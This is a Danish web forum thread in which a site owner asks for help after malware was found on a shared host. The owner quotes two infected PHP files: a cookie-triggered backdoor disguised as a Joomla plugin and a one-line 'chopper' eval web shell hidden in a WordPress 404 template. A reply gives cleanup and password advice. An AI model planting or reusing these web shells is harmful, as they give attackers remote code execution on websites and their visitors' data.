Avatar billede cybermaster-ny Nybegynder
06. august 2014 - 10:34 Der er 2 kommentarer

Webhotel med 100 domainer - Hack og Malware

Hej Alle sammen

Jeg har et webhotel med omkring 100 websites der køre. For omkring en månedstid siden fik jeg en mail fra min udbydere at de havde fundet malware.

Jeg slettede den instalation, og lage en frisk kopi op. I den forbindelse skiftede jeg alle password vedr mysql, ftp og kontoen til webhotellet.

I nat modtog jeg så en mail om at der var 3 andre websites der var ramt.
Ondsindede filer fundet på http://... .dk Malware er fundet i flg filer:

404.php
site_disabled_by_gigahost_due_to_spam/wp-content/themes/buttercream/404.php
wp-content/uploads/wysija/themes/main2/index.php
wp-content/uploads/wysija/themes/main2/index.php


Og ganske rigtigt...

I den ene fil:

<?php
/**
* @package    Joomla.Plugin.System
* @since      1.5
*
*
*/
class PlgSysJoomla {
public function __construct() {
$file=@$_COOKIE['ljNqe3'];
if ($file){ $opt=$file(@$_COOKIE['ljNqe2']); $au=$file(@$_COOKIE['ljNqe1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}
$index=new PlgSysJoomla;

Og i den anden fil er dette:

<?php @eval($_POST['chopper']);?>
<?php get_header(); ?>
<div class="archive-container">
    <h2>Error 404</h2>
    Den side du kigger efter, findes desværre ikke mere.
</div>

<?php get_sidebar(); ?>

<?php get_footer(); ?>

Er der nogen der kan hjælpe mig med at give nogle svar om hvor det kommer fra, og hvordan jeg slipper af med det?

Jeg er lidt b

bange for at det ligger i en "uskyldig" fil et sted på webhotellet, og bare bliver ved med at kopiere sig selv igen og igen.

Mvh

Henrik
Avatar billede ejvindh Ekspert
08. august 2014 - 09:51 #1
Det trælse svar er: Der er to muligheder. Enten er dit webhotels sikkerhed kompromitteret, eller også er dine installationers.

Jeg bruger selv gigahost, som du vist også gør, og har ikke oplevet noget lignende, så umiddelbart vil jeg gætte på, at det er din opsætning, den er gal med. Men jeg vil da opfordre dig til at henvende dig til Gigahost, så de har mulighed for at undersøge det. For hvis det er dem, der er blevet hacket, så kan du jo rette alt det du vil, uden at hindre hackeren i, alligevel at få adgang...

Det du selv kan have gjort forkert er at have en uopdateret udgave af dit CMS lagt op, installeret nogle usikre plugins, eller brugt for svage passwords til din ftp, mysql, osv.

Svaret på, hvordan du slipper af med det (hvis altså ikke det er Gigahost, der har problemet) er sådan set at gøre, som du gjorde med de første sider: Slet alle php-filer, og lav en frisk installation fra det pågældende CMS' hovedside, og brug helt nye (stærke) passwords.

Du vil sandsynligvis have lyst til at genindlæse din Mysql-database. Her mener jeg dog, at du skal være opmærksom på, at den også kan være kompromitteret. Så du bliver desværre nødt til at undersøge om den indeholder nogle mærkelige strenge. Det kræver naturligvis lidt kendskab til både Mysql og dit CMS...
Avatar billede cybermaster-ny Nybegynder
12. august 2014 - 21:06 #2
Tak for svar ejvindh

Jeg lader spørgsmålet stå åbent lidt endnu, i håb om der måske er nogen der ved hvad det kan være for en "virus" og finde den fil der er syndebukken.
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester